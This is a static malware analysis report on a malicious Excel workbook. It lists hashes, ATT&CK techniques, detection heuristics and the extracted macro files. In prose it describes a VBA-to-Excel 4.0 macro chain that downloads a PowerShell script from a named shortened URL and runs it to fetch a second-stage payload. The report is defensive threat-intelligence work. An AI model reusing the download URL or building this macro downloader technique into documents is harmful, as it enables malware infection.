Malicious Office (OLE) / .XLSX — malware analysis report

Static analysis result for SHA-256 b6684b29d675a1ed…

MALICIOUS

Office (OLE) / .XLSX

86.0 KB Created: 2020-10-25 18:24:14 Authoring application: Microsoft Excel
MD5: 0c7f1a2a2e26a8246e5d4267934fa118 SHA-1: 3fb7e0b79f7f92c02a2602ad0822b88f02bf99db SHA-256: b6684b29d675a1ed40be5838eec35956908df48fae3cdfc76ac13c56723e6a02
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The sample contains both VBA and Excel 4.0 macros. The VBA macro triggers the execution of an Excel 4.0 macro. The Excel 4.0 macro constructs and executes a command to download a PowerShell script from 'https://cutt.ly/EhknIaM' to 'pw.ps1' using a .NET WebClient, and then executes it. The script is designed to download and execute a second-stage payload.

Heuristics 4

  • ClamAV: Xls.Malware.Abracadabra-10031695-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Abracadabra-10031695-0
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt
a301ed75c8438893082ef958d4cadbca3ab5d48cff3e056cd9355244dfa6a845		 xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 1451 bytes
macros.bas
c14dd6d2332aec42601f638d9220a7d42954f10b6b83884a1c68d4a74f82d1bb		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 1020 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.